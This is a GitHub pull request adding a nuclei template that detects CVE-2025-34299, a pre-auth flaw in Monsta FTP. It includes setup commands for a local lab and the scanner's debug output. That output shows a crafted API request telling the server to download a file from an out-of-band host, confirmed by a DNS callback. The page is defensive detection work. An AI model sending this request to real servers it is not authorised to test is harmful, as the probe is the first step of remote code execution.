
Add CVE-2025-34299 Monsta FTP Pre-Auth RCE template #14331

Merged
theamanrawat merged 4 commits into projectdiscovery:main from KrE80r:CVE-2025-34299-oast
Dec 11, 2025


Contributor

@KrE80r KrE80r commented Dec 11, 2025

/claim #14328

CVE-2025-34299 - Monsta FTP Pre-Auth RCE

Test Environment: https://github.com/KrE80r/CVE-2025-34299-lab

git clone https://github.com/KrE80r/CVE-2025-34299-lab
cd CVE-2025-34299-lab
docker-compose up -d
nuclei -t http/cves/2025/CVE-2025-34299.yaml -u http://localhost:8080 -debug

Debug output from the run above (local lab target at http://localhost:8080):

[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.5 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-34299] Dumped HTTP request for http://localhost:8080/mftp/

GET /mftp/ HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2025-34299] Dumped HTTP response http://localhost:8080/mftp/

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Thu, 11 Dec 2025 05:24:04 GMT
Server: Apache/2.4.54 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33

<!DOCTYPE html>
<html ng-app="MonstaFTP">
<head>
    <title>Monsta FTP</title>
    <meta charset="UTF-8">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport"
          content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">

    <link rel="shortcut icon" type="image/x-icon" href="application/frontend/images/logo-favicon.png">
    <link rel="apple-touch-icon" href="application/frontend/images/logo-webclip.png">

    <input type="hidden" id="g_defaultLanguage" value="en_us"/>
    <input type="hidden" id="g_xhrTimeoutSeconds" value="30"/>
    <input type="hidden" id="g_isNewWindowsInstall" value="false"/>
    <input type="hidden" id="g_ftpConnectionAvailable" value="true"/>
    <input type="hidden" id="g_openSslAvailable" value="true"/>
    <input type="hidden" id="g_resetPasswordAvailable" value="false"/>
    <input type="hidden" id="g_forgotPasswordAvailable" value="false"/>
    
    <script>
        var g_defaultLanguage = document.getElementById('g_defaultLanguage').value;
        var g_upgradeURL = "http://www.monstaftp.com/upgrade";
        var g_loadComplete = false;
        var g_xhrTimeoutSeconds = +document.getElementById('g_xhrTimeoutSeconds').value;
        var g_isMonstaPostEntry = false;
        var g_isNewWindowsInstall = document.getElementById('g_isNewWindowsInstall').value == 'true';
        var g_ftpConnectionAvailable = document.getElementById('g_ftpConnectionAvailable').value == 'true';
        var g_openSslAvailable = document.getElementById('g_openSslAvailable').value == 'true';
        var g_resetPasswordAvailable = document.getElementById('g_resetPasswordAvailable').value == 'true';
        var g_forgotPasswordAvailable = document.getElementById('g_forgotPasswordAvailable').value == 'true';

            </script>

    <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Open+Sans:400,600,300">
    <script src="application/frontend/assets-2.10.4/vendor.js"></script>

    <link rel="stylesheet" href="application/frontend/css/monsta.css">
    <link rel="stylesheet" href="settings/theme.css">
    
    <script src="application/frontend/js/monsta-min-2.10.4.js"></script>
    <script src="application/frontend/js/templates-2.10.4.js"></script>

        <script>
        var g_languageFiles = [["en_us","English (US)"]];
    </script>
</head>
<body>

    <div id="spinner" ng-controller="SpinnerController" ng-show="spinnerVisible">
        <div>
            <i class="fa fa-spinner fa-pulse fa-3x fa-fw"></i>
        </div>
    </div>
    <div id="file-xfer-drop" ng-controller="DragDropController">
        <div translate>DROP_FILES_INSTRUCTION</div>
    </div>
    <ng-include src="'application/frontend/templates/modal-chmod.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-login.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-password-management.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-editor.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-transfers.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-prompt.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-confirm.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-error.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-addons.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-settings.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-properties.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-login-link.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-choice.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-update.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-upgrade-required.html'"></ng-include>

    <div id="sb-site" canvas="container">
        <ng-include src="'application/frontend/templates/body-header.html'"></ng-include>
        <ng-include src="'application/frontend/templates/body-history.html'"></ng-include>
        <ng-include src="'application/frontend/templates/body-files.html'"></ng-include>
        <ng-include src="'application/frontend/templates/body-footer.html'"></ng-include>
    </div>

    <ng-include src="'application/frontend/templates/body-slidebar.html'"></ng-include>
    <iframe src="about:blank" id="download-iframe"></iframe>
    <script>
        var versionQS = "v=2.10.4&amp;r=http%3A%2F%2Flocalhost%3A8080%2Fmftp%2F&amp;os=Linux&amp;e=s" +getFpQs();
        document.write('<scri' + 'pt async src="//monstaftp.com/_callbacks/latest-version.php?' + versionQS + '"></scr' + 'ipt>')
    </script>
</body>
</html>
[INF] Using Interactsh Server: oast.site
[INF] [CVE-2025-34299] Dumped HTTP request for http://localhost:8080/mftp/application/api/api.php

POST /mftp/application/api/api.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Version/16.3 Safari/605.1.15
Connection: close
Content-Length: 284
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

request={"connectionType":"ftp","configuration":{"host":"d4t5at4h6gvocer84vf0iqhcycd9ws8qn.oast.site","username":"nuclei-oast","initialDirectory":"/","password":"test","port":21},"actionName":"downloadFile","context":{"remotePath":"/test.txt","localPath":"/tmp/nuclei-oast-test.txt"}}
[DBG] [CVE-2025-34299] Dumped HTTP response http://localhost:8080/mftp/application/api/api.php

HTTP/1.1 577 Monsta Exception
Connection: close
Content-Length: 240
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 11 Dec 2025 05:24:13 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: PHPSESSID=dfc61b9995bc63e0f5382c44167a5df6; path=/
X-Powered-By: PHP/7.4.33

{"errors":["FTP connection to d4t5at4h6gvocer84vf0iqhcycd9ws8qn.oast.site:21 failed."],"localizedErrors":[{"errorName":"CONNECTION_FAILURE_ERROR","context":{"protocol":"FTP","host":"d4t5at4h6gvocer84vf0iqhcycd9ws8qn.oast.site","port":21}}]}
[D4T5At4H6GVOCeR84vF0iqHCyCD9wS8qN] Received DNS interaction from 172.217.32.208 at 2025-12-11 05:24:13
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 14278
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;D4T5At4H6GVOCeR84vF0iqHCyCD9wS8qN.oASt.site.   IN       A



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 14278
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;D4T5At4H6GVOCeR84vF0iqHCyCD9wS8qN.oASt.site.   IN       A

;; ANSWER SECTION:
D4T5At4H6GVOCeR84vF0iqHCyCD9wS8qN.oASt.site.    3600    IN      A       178.128.16.97

;; AUTHORITY SECTION:
D4T5At4H6GVOCeR84vF0iqHCyCD9wS8qN.oASt.site.    3600    IN      NS      ns1.oast.site.
D4T5At4H6GVOCeR84vF0iqHCyCD9wS8qN.oASt.site.    3600    IN      NS      ns2.oast.site.

;; ADDITIONAL SECTION:
ns1.oast.site.  3600    IN      A       178.128.16.97
ns2.oast.site.  3600    IN      A       178.128.16.97


[CVE-2025-34299:word-1] [http] [critical] http://localhost:8080/mftp/application/api/api.php ["2.10.4"]
[CVE-2025-34299:dsl-2] [http] [critical] http://localhost:8080/mftp/application/api/api.php ["2.10.4"]
[INF] Scan completed in 14.520681811s. 2 matches found.

References:

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Dec 11, 2025
@theamanrawat theamanrawat merged commit 443257a into projectdiscovery:main Dec 11, 2025
3 checks passed
@DhiyaneshGeek DhiyaneshGeek linked an issue Jan 5, 2026 that may be closed by this pull request


Development

Successfully merging this pull request may close these issues.

CVE-2025-34299 - Monsta FTP - Unrestricted File Upload 💰
